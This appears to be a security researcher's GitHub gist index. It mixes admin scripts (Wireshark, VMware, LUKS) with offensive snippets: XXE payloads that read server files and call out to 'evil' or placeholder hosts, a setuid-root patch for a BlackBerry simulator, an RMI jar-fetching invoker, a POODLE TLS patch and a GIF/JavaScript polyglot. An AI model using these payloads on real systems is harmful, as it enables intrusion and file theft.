Skip to content

Instantly share code, notes, and snippets.

@staaldraad
staaldraad / setWireshark
Last active Aug 29, 2015
Run wireshark without having to be root
View setWireshark
#!/bin/bash
if [ "$1" != "" ]; then
USERNAME=$1
else
echo "ERROR: no username supplied"
echo "Using current user"
USERNAME=`whoami`
fi
@staaldraad
staaldraad / vmware_installfix
Created Feb 22, 2014
VWare Workstation 10 on Fedora 20 or kernel 3.13+ systems
View vmware_installfix
# Ensure all kernel headers are installed
yum install kernel-devel kernel-headers
# Make a copy of version.h to a location known to Vmware
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/
#fix vmnet build
cd /usr/lib/vmware/modules/source/
curl http://pastie.org/pastes/8672356/download -o vmware-netfilter.patch
tar xf vmnet.tar
@staaldraad
staaldraad / gist:2f0d2ba4aa6afb0dd36f
Last active Aug 29, 2015
Update kernel paths for Ubuntu + vmware-player
View gist:2f0d2ba4aa6afb0dd36f
vmware-installer -u vmware-player
http://dandar3.blogspot.cz/2014/01/vmware-player-601-on-ubuntu-1404-alpha.html
@staaldraad
staaldraad / crypt_setup.sh
Last active Aug 29, 2015
Setup crypt container
View crypt_setup.sh
#create new file to use as container
#dd if=/dev/zero of=/out count=5000k
fallocate -l 1G test.img
#create luks wrapper
cryptsetup -v -y luksFormat /out
cryptsetup luksOpen /out cryptname
cryptsetup -v status cryptname
#make into filesystem
@staaldraad
staaldraad / PatchBB10Simulator.sh
Created Jun 18, 2014
Root Blackberry Simulator
View PatchBB10Simulator.sh
perl -i.backup -0777 -pe 's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g' BlackBerry10Simulator-s001.vmdk
@staaldraad
staaldraad / xxe
Created Jul 7, 2014
XXE remote dtd
View xxe
Payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
@staaldraad
staaldraad / pyrmi.py
Last active Dec 1, 2018
Quick and dirty RMI invoker
View pyrmi.py
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""
import socket
import binascii
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@staaldraad
staaldraad / poodle-tls-go.patch
Created Dec 9, 2014
Patch Go libs for poodle-tls scan - Modified from https://gist.github.com/singe/f433c54f134a9390214e to work with Go 1.3.3 for Linux. -- These are mods to Adam Langley's (@agl__) work.
View poodle-tls-go.patch
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go
--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100
+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000
@@ -301,6 +301,8 @@
// be used.
CurvePreferences []CurveID
+ BreakCBCPadding bool
+
serverInitOnce sync.Once // guards calling (*Config).serverInit
@staaldraad
staaldraad / gifjs
Created Jan 4, 2015
GIF that is also Javascript (via Ange Albertini at 31C3 - https://speakerdeck.com/ange/funky-file-formats-31c3)
View gifjs
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,..
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../*.....;*/=1;a
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello");